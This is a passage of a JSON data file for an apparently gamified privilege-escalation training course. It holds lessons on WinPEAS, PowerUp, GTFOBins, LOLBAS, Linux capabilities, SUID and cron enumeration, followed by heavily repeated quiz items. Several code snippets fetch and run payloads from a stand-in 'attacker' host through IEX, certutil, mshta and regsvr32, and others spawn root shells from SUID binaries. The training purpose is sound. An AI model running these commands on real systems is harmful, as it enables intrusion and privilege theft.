always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-pe-winpeas","cat":"Privilege Escalation","title":"WinPEAS Enumeration","diff":1,"xp":75,"intro":"Automated Windows privilege escalation enumeration.","sections":[{"type":"text","content":"Automated Windows privilege escalation enumeration."},{"type":"code","lang":"bash","content":".winPEASany.exe\n.winPEASx64.exe\n# Or PowerShell version\nIEX(New-Object Net.WebClient).DownloadString('http://attacker/winPEAS.ps1')"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"WinPEAS checks for...","opts":["Only services","Hundreds of Windows privesc vectors at once","Only registry","Only scheduled tasks"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-pe-powerup","cat":"Privilege Escalation","title":"PowerUp Windows Privesc","diff":2,"xp":150,"intro":"PowerShell script for finding Windows escalation paths.","sections":[{"type":"text","content":"PowerShell script for finding Windows escalation paths."},{"type":"code","lang":"bash","content":"powershell -ep bypass\nImport-Module PowerUp.ps1\nInvoke-AllChecks"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"PowerUp checks for...","opts":["Network vulnerabilities","Service misconfigs, unquoted paths, autorun, and more","Web vulnerabilities","Database issues"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-pe-gtfobins","cat":"Privilege Escalation","title":"GTFOBins Reference","diff":1,"xp":75,"intro":"Unix binaries exploitable for privilege escalation.","sections":[{"type":"text","content":"Unix binaries exploitable for privilege escalation."},{"type":"code","lang":"bash","content":"# gtfobins.github.io\n# If vim is SUID: vim -c ':!bash'\n# If find is SUID: find / -exec /bin/bash ;\n# If python is SUID: python -c 'import os;os.system(\"/bin/bash\")'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"GTFOBins catalogs...","opts":["Web vulnerabilities","Unix binaries that can be exploited for privesc","Windows tools","Network protocols"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-pe-lolbas","cat":"Privilege Escalation","title":"LOLBAS Windows Binaries","diff":2,"xp":150,"intro":"Legitimate Windows binaries abused for attacks.","sections":[{"type":"text","content":"Legitimate Windows binaries abused for attacks."},{"type":"code","lang":"bash","content":"# LOLBAS: lolbas-project.github.io\n# certutil: download files\ncertutil -urlcache -split -f http://attacker/payload C:payload\n# mshta: execute HTA\nmshta http://attacker/evil.hta\n# regsvr32: bypass AppLocker\nregsvr32 /s /n /u /i:http://attacker/evil.sct scrobj.dll"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"LOLBAS binaries evade detection because...","opts":["They're encrypted","They're legitimate signed system binaries","They're hidden","They run in memory only"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-pe-linux-capabilities-enum","cat":"Privilege Escalation","title":"Linux Capabilities Enumeration","diff":2,"xp":150,"intro":"Find binaries with dangerous capabilities.","sections":[{"type":"text","content":"Find binaries with dangerous capabilities."},{"type":"code","lang":"bash","content":"getcap -r / 2>/dev/null\n# Dangerous capabilities:\n# cap_setuid = change UID (root)\n# cap_dac_read_search = read any file\n# cap_net_raw = raw sockets\n# cap_sys_admin = mount, ptrace"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"cap_setuid allows...","opts":["Network access","Changing the process UID to 0 (root)","File deletion","Log viewing"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-pe-linux-sticky-bit","cat":"Privilege Escalation","title":"Sticky Bit and Special Permissions","diff":1,"xp":75,"intro":"Understand SUID, SGID, and sticky bit.","sections":[{"type":"text","content":"Understand SUID, SGID, and sticky bit."},{"type":"code","lang":"bash","content":"# SUID (4xxx): execute as file owner\nfind / -perm -4000 2>/dev/null\n# SGID (2xxx): execute as group owner\nfind / -perm -2000 2>/dev/null\n# Sticky bit (1xxx): only owner can delete\nls -la /tmp  # drwxrwxrwt"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"The sticky bit on /tmp means...","opts":["Anyone can read","Only file owners can delete their own files","No one can write","Root can't access"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"g-pe-linux-cronjob-enum","cat":"Privilege Escalation","title":"Cron Job Enumeration","diff":1,"xp":75,"intro":"Find all scheduled tasks for exploitation opportunities.","sections":[{"type":"text","content":"Find all scheduled tasks for exploitation opportunities."},{"type":"code","lang":"bash","content":"cat /etc/crontab\nls -la /etc/cron.d/\nls -la /etc/cron.daily/ /etc/cron.hourly/\ncrontab -l  # your crontab\nsudo crontab -l  # root crontab\npspy  # catch cron in action"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Why use pspy for cron enumeration?","opts":["It's faster","It catches cron jobs not visible in standard files","It cracks passwords","It scans networks"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon 